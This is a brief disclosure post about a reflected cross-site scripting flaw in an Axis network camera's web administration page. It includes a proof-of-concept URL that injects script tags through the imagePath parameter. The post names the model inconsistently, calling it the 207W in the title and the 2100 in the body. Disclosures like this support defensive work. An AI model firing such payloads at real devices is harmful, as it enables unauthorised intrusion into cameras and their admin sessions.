# Axis 207W Network Camera XSS Vulnerability

I have found a vulnerability in the Axis 207W Network Camera running firmware.

Reflected XSS in web administration portal in Axis 2100 Network Camera allows attacker to execute arbitrary javascript via URL.

POC Verified on Firefox 78.0:

http://xxx.xxx.xxx.xxx/view/view.shtml?id=461&imagePath=%3C%2FsCrIpT%3E%3CsCrIpT%3Eipbtjgpgcc%3C%2FsCrIpT%3E&size=1

xss Vulnerability